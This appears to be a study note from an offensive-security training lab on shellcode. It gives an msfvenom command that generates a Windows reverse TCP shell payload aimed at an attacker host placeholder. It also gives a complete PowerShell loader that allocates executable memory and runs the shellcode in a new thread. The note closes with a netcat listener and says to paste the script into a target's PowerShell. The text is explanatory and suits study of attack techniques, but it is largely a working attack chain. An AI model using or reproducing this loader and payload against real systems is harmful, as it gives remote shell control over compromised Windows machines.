SHELLCODES
a piece of code used to inject commands into a vulnerable system. it gives attackers control over a compromised machine.
SHELLCODE GENERATION
root@oco:~$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=attackBoxIP LPORT=attackBoxListeningPort -f powershell
* the -p flag tells msfvenom what type of payload to create
* the windows/x64/shell_reverse_tcp specifies a reverse shell for a Windows machine
* the -f powershell specifies the format for the output
- this payload will be in PowerShell format and can be executed as a script on a Windows machine.
- the output will be in a hex-encoded byte array
#this is the PS Script that will execute the shellcode
#this is loaded into memory and then creates a thread for its execution
#These classes use the DllImport attribute to load specific functions from the kernel32 DLL, which is part of the Windows API.
#VirtualAlloc: This function allocates memory in the process's address space. It's commonly used in scenarios like this to prepare memory for storing and executing shellcode.
#CreateThread: This function creates a new thread in the process. The thread will execute the shellcode that has been loaded into memory.
#WaitForSingleObject: This function pauses execution until a specific thread finishes its task. In this case, it ensures that the shellcode has completed execution.
#These classes are then added to PowerShell using the Add-Type command, allowing PowerShell to use these functions
$VrtAlloc = @"
using System;
using System.Runtime.InteropServices;
public class VrtAlloc{
[DllImport("kernel32")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
}
"@
Add-Type $VrtAlloc
$WaitFor= @"
using System;
using System.Runtime.InteropServices;
public class WaitFor{
[DllImport("kernel32.dll", SetLastError=true)]
public static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
}
"@
Add-Type $WaitFor
$CrtThread= @"
using System;
using System.Runtime.InteropServices;
public class CrtThread{
[DllImport("kernel32", CharSet=CharSet.Ansi)]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
}
"@
Add-Type $CrtThread
[Byte[]] $buf = SHELLCODE_PLACEHOLDER
[IntPtr]$addr = [VrtAlloc]::VirtualAlloc(0, $buf.Length, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $buf.Length)
$thandle = [CrtThread]::CreateThread(0, 0, $addr, 0, 0, 0)
[WaitFor]::WaitForSingleObject($thandle, [uint32]"0xFFFFFFFF")
#the shellcode is stored in teh $buf variable
#the VirtualAlloc function then allocates a block of memory where the shellcode will be stored
#0 for the memory address, meaning that Windows will decide where to allocate the memory.
#$size for the size of the memory block, which is determined by the length of the shellcode.
#0x3000 for the allocation type, which tells Windows to reserve and commit the memory.
#0x40 for memory protection, the memory is readable and executable (necessary for executing shellcode).
#After memory is allocated, the Marshal.Copy function copies the shellcode from the $buf array into the allocated memory address ($addr), preparing it for execution.
#Once the shellcode is stored in memory, the script calls the CreateThread function to execute the shellcode by creating a new thread. This thread is instructed to start execution from the memory address where the shellcode is located ($addr). The script then uses the WaitForSingleObject function, ensuring it waits for the shellcode execution to finish before continuing. This makes sure that the shellcode runs completely before the script ends its execution.#to use the shellcode
root@oco:~$ nc -nlvp 1111
#paste each line of the PS C# script into the target's powershell window or
#write a script the will be executed via a single command
Last updated